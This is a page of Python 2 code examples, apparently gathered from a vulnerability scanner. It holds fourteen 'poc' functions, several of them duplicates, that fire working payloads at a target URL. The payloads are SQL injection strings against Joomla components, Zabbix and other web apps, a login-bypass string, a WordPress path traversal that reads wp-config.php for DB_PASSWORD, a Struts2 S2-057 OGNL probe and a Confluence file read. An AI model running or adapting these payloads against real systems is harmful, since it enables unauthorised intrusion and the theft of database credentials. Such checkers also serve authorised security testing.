Ejemplo n.º 1
0
def poc(_inp):
    try:
        if '://' not in _inp:
            _inp = 'http://' + _inp
        for inp in iterate_path(_inp):
            payloads = ['/spaces/viewdefaultdecorator.action?decoratorName=']
            for each in payloads:
                if '.properties' in requests.get(url=inp + each).content:
                    return True
        return False
    except Exception, e:
        return False
Ejemplo n.º 2
0
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    payload = '/force-download.php?file=wp-config.php'
    for i in iterate_path(url):
        if '?' in i:
            continue
        target = i.rstrip('/') + payload
        try:
            r = urllib2.urlopen(target).read()  # cannot use requests here
            if 'define(' in r and 'DB_PASSWORD' in r:
                return target
        except Exception, e:
            pass
Ejemplo n.º 3
0
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)".format(plain=plain)
        if '?' in each:
            continue
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except Exception, e:
            pass
Ejemplo n.º 4
0
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_videoflow&task=search&vs=1&searchword=-3920%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x71786a7a71%2C%28MID%28%28IFNULL%28CAST%28md5%28{plain}%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x716b6b7a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23".format(plain=plain)
        if '?' in each:
            continue
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except Exception, e:
            pass
Ejemplo n.º 5
0
def poc(target):
    base_url = target if "://" in target else 'http://' + target
    for each in iterate_path(base_url):
        try:
            url = each
            g = requests.get(url, headers={'User-Agent': firefox()})
            if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
                return url
            url = url + '/solr/'
            g = requests.get(url, headers={'User-Agent': firefox()})
            if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
                return url
        except Exception:
            pass
    return False
Ejemplo n.º 6
0
def poc(url):
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    payload = "/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(119)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(112)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)"
    for each in iterate_path(url):
        target = each.rstrip('/') + payload
        try:
            r = requests.get(target, timeout=20)
            if 'Warning: invalid QName ":qjwbq1pkkvq"' in r.content:
                return url
        except Exception:
            pass
    return False
Ejemplo n.º 7
0
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    payload = "' or '1'='1' -- ' ~ ' or '1'='1'"
    data = {'userid': payload, 'userpass': payload, 'submit': 'Enter'}
    for each in iterate_path(url):
        if '?' in each:
            continue
        target = each.rstrip('/') + '/myadmin/admin_validation.php'
        try:
            r = requests.post(target, data=data, timeout=15)
            if 'form name="frmNextstep"' in r.content:
                return target
        except Exception:
            pass
    return False
Ejemplo n.º 8
0
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    payload = "' or '1'='1' -- ' ~ ' or '1'='1'"
    data = {'userid': payload, 'userpass': payload, 'submit': 'Enter'}
    for each in iterate_path(url):
        if '?' in each:
            continue
        target = each.rstrip('/') + '/myadmin/admin_validation.php'
        try:
            r = requests.post(target, data=data, timeout=15)
            if 'form name="frmNextstep"' in r.content:
                return target
        except Exception:
            pass
    return False
Ejemplo n.º 9
0
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    payload = "/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
    for each in iterate_path(url):
        if '?' in each:
            continue
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if 'ed733b8d10be225eceba344d533586' in r.content:
                return '[mysql]' + each
            if 'Error in query [' in r.content or 'SQL error [' in r.content:
                return each
        except Exception, e:
            pass
Ejemplo n.º 10
0
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    payload = "/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
    for each in iterate_path(url):
        if '?' in each:
            continue
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if 'ed733b8d10be225eceba344d533586' in r.content:
                return '[mysql]'+ each
            if 'Error in query [' in r.content or 'SQL error [' in r.content:
                return each
        except Exception, e:
            pass
Ejemplo n.º 11
0
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_videoflow&task=search&vs=1&searchword=-3920%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x71786a7a71%2C%28MID%28%28IFNULL%28CAST%28md5%28{plain}%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x716b6b7a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23".format(
            plain=plain)
        if '?' in each:
            continue
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except Exception, e:
            pass
Ejemplo n.º 12
0
def poc(url):
    if '://' not in url:
        url = 'http://' + url
    for each in iterate_path(url):
        plain, cipher = randomMD5(3)
        payload = "/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)".format(plain=plain)
        if '?' in each:
            continue
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if cipher in r.content:
                return each
        except:
            pass
    return False
Ejemplo n.º 13
0
def poc(url, **kwargs):
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    domain = get_domain(url)
    proxies = {'http': '127.0.0.1:9999'}
    headers = {
        "User-Agent":
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0'
    }
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    parser = urlparse(url)
    if parser.path:
        _path_list = parser.path.replace('//', '/').strip('/').split('/')[-1]
    else:
        _path_list = 'index.action'
    url_list = iterate_path(url)
    for urls in url_list:
        url = urls + '/${%s-%s}/%s' % (ran_a, ran_b, _path_list)
        try:
            res = requests.get(
                url,
                timeout=timeout,
                headers=headers,
                allow_redirects=False,
                verify=False,
            )
            if res.status_code == 302 and res.headers.get(
                    'Location') is not None and str(
                        ran_check) in res.headers.get('Location'):
                urlLoca = res.headers.get('Location')
                res2 = requests.get(domain + urlLoca,
                                    headers=headers,
                                    timeout=6,
                                    allow_redirects=False,
                                    verify=False)
                if str(ran_check) in res2.text:
                    result = "目标存在 Struts2-057, check url: %s" % url
                    return result
        except:
            pass
Ejemplo n.º 14
0
def poc(url):
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    plain, cipher = randomMD5()
    # 用全部字段验证,增加70%结果
    payload = "/about/show.php?lang=en&id=-2864 UNION ALL SELECT " + (("md5(%s)," % plain) * 27).rstrip(',') + '--'
    for each in iterate_path(url):  # 对每个子路径尝试,增加20%结果
        target = each.rstrip('/') + payload
        try:
            r = requests.get(target, timeout=20)
            if r.status_code == 200 and cipher in r.content:
                return url
        except Exception:
            pass  # 从break改为pass增加10%结果
    return False